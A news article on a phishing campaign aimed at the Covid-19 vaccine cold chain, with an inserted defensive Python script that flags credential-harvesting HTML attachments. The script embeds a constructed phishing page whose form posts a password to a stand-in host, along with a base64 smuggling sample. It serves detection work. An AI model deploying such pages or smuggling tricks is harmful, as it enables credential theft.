Since the Covid-19 pandemic began, hackers and scammers have focused extraordinary attention on it, whether for espionage or for grift. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks is focused on the complex supply chain that will get them to people in need.
Two of the leading Covid-19 vaccine candidates, from Pfizer and Moderna, have been submitted to the FDA for emergency authorization; the agency is scheduled to evaluate Pfizer's application on December 10 and Moderna's one week later. UK regulators approved Pfizer's vaccine on Wednesday. The next challenge for both vaccines is transporting them. They must be kept at frigid temperatures, minus 4 degrees Fahrenheit (minus 20 Celsius) for Moderna and 94 degrees below zero Fahrenheit (minus 70 Celsius) for Pfizer, which requires a network of specialists known as the "cold chain." Today, security researchers at IBM are releasing findings that a campaign has for months targeted a significant number of those companies across six countries.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst with IBM Security X-Force. “It’s the first time we’ve seen that level of pre-positioning within the context of the pandemic.”
The campaign seems to have focused on companies and organizations associated with the Cold Chain Equipment Optimization Platform of Gavi, the Vaccine Alliance, an effort to streamline and strengthen the cold chain. The only target IBM identified by name was the European Commission's Directorate-General for Taxation and Customs Union, which among other things determines tax relief associated with transporting vaccines across borders. Seemingly any part of the cold chain was within bounds for the attackers. Other targets mentioned by IBM include manufacturers of solar panels, which might power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech, and container transport companies.
The attackers sent emails purporting to be from Haier Biomedical, a Chinese company that advertises itself as “the world's only complete cold chain provider,” under the guise of routine requests for quotations. The emails contained HTML attachments that asked the recipient to enter their credentials, which the hackers could then harvest to infiltrate the targeted company.
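The attachment mechanism described above, a self-contained HTML file that presents a login form and posts whatever is typed into it, is something a mail gateway or analyst can triage mechanically before a user ever opens it. The script below is an added example, not code from the IBM report or from this article, and it assumes nothing about the real campaign: the sample attachment, the sender domain example.com and the collection host example.net are constructed placeholders, not indicators, and the heuristics (a password field in an attachment, a form posting off the purported sender's domain, a script that decodes an embedded payload with atob) are generic credential-phishing and HTML-smuggling traits rather than anything IBM attributed to this actor.

```python
"""Triage an HTML e-mail attachment for credential-harvesting traits.

Added example, not from the IBM report. Every host, domain and attachment
here is constructed for illustration; none is a real indicator.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect form actions, password inputs and inline script text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self._in_script = False
        self.script_text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so this captures them.
        if self._in_script:
            self.script_text.append(data)


def _same_org(host, sender_domain):
    return host == sender_domain or host.endswith("." + sender_domain)


def triage_attachment(html, sender_domain):
    """Return {'suspicious': bool, 'findings': [str]} for one HTML attachment.

    sender_domain is the domain the mail claims to come from (assumed input);
    a form that posts anywhere else is the classic harvesting pattern.
    """
    p = _FormScanner()
    p.feed(html)
    findings = []

    for action in p.form_actions:
        host = urlparse(action).hostname
        if host and not _same_org(host, sender_domain):
            findings.append(f"form posts credentials to third-party host {host}")

    if p.password_inputs:
        findings.append(f"{p.password_inputs} password field(s) inside a mail attachment")

    script = "".join(p.script_text)
    if re.search(r"atob\(|unescape\(|fromCharCode", script):
        findings.append("script decodes an embedded payload at runtime (HTML smuggling pattern)")

    # Decode any large base64 literal handed to atob() and look for hidden URLs.
    for blob in re.findall(r"atob\(['\"]([A-Za-z0-9+/=]{40,})['\"]\)", script):
        try:
            decoded = base64.b64decode(blob).decode("utf-8", "replace")
        except (ValueError, TypeError):
            continue
        for url in re.findall(r"https?://[^\s'\"<>]+", decoded):
            findings.append(f"hidden URL inside base64 payload: {url}")

    return {"suspicious": bool(findings), "findings": findings}


# Constructed sample: a fake "request for quotation" login page. The smuggled
# fragment is base64-encoded at build time so the decode path is exercised.
_SMUGGLED = base64.b64encode(b'<a href="https://example.net/portal">sign in</a>').decode()
SAMPLE_ATTACHMENT = f"""<html><body>
<p>Please sign in to view the Request for Quotation.</p>
<form method="post" action="https://example.net/collect">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="View RFQ">
</form>
<script>document.write(atob('{_SMUGGLED}'));</script>
</body></html>"""

# Constructed benign attachment: static content, no form, no script.
BENIGN_ATTACHMENT = "<html><body><h1>Quotation #0001</h1><p>Unit price: see table.</p></body></html>"

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        result = triage_attachment(doc, "example.com")
        print(name, "suspicious" if result["suspicious"] else "clean")
        for f in result["findings"]:
            print("  -", f)
```

The point of the off-domain check is that a genuine vendor portal would post back to the vendor's own domain; a quotation "from" one company whose form submits to an unrelated host is the tell regardless of how convincing the branding is. The decode step matters because attackers increasingly keep the real page or URL base64-encoded inside a script so that static string matching on the attachment finds nothing.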
IBM says it doesn’t know if any of the attacks were successful or what the ultimate objective of the campaign might be. “The door is really open,” says Zaboeva. “Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
In a way, the attacks are simply an evolution of what Covid-19 researchers have already been facing for months. In July, officials from the US, UK, and Canada called out Russian hackers for zeroing in on vaccine development. China has also been implicated in an attempt against Moderna this summer. Just this week, The Wall Street Journal reported that apparent North Korean hackers attempted to break into nine health organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberassault on companies and organizations working on Covid-19 research and vaccines is unsurprising, given the stakes. The shift in focus to the cold chain, while also not unexpected, is cause for particular concern, given the delicate and urgent nature of vaccine deployment.
“As we shift towards distributing a vaccine for Covid-19, the logistics of this operation will become extremely critical,” says John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly mundane security issues could have major repercussions to such a complex and important effort.”
Adding to the challenge is that cold-chain companies often aren’t as well equipped to defend themselves as multinational drug companies or finance firms. In mid-November, cold storage firm Americold suffered a ransomware attack—unrelated to the newly detailed phishing campaign—that knocked some of its operations offline. “We have a strong concern that as this cold chain becomes global critical infrastructure, the individual organizations involved may not be prepared with that security posture that’s really needed to protect them,” says Nick Rossmann, IBM Security X-Force’s global threat intel lead.
"Gavi has strong policies and processes in place to prevent such phishing attacks and hacking attempts," a Gavi spokesperson said in a statement. "We are working closely with our partners on security awareness to continue to strengthen these best practices."
None of the attempts IBM spotted were against US-based companies. Still, in response to the IBM report, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency issued an alert warning organizations associated with the Operation Warp Speed vaccine initiative in the US to look out for similar attacks. "Today’s report highlights the importance of cybersecurity diligence at each step in the vaccine supply chain," CISA chief strategist for health care Josh Corman said in a statement. "CISA encourages all organizations involved in vaccine storage and transport to harden attack surfaces, particularly in cold storage operation, and remain vigilant against all activity in this space."
The logistics around the cold chain are hard enough to get right as it is. That hackers might further complicate things, or could be in a position to upend them, is a distressing possibility as the US and the rest of the world enter a critical phase of the pandemic.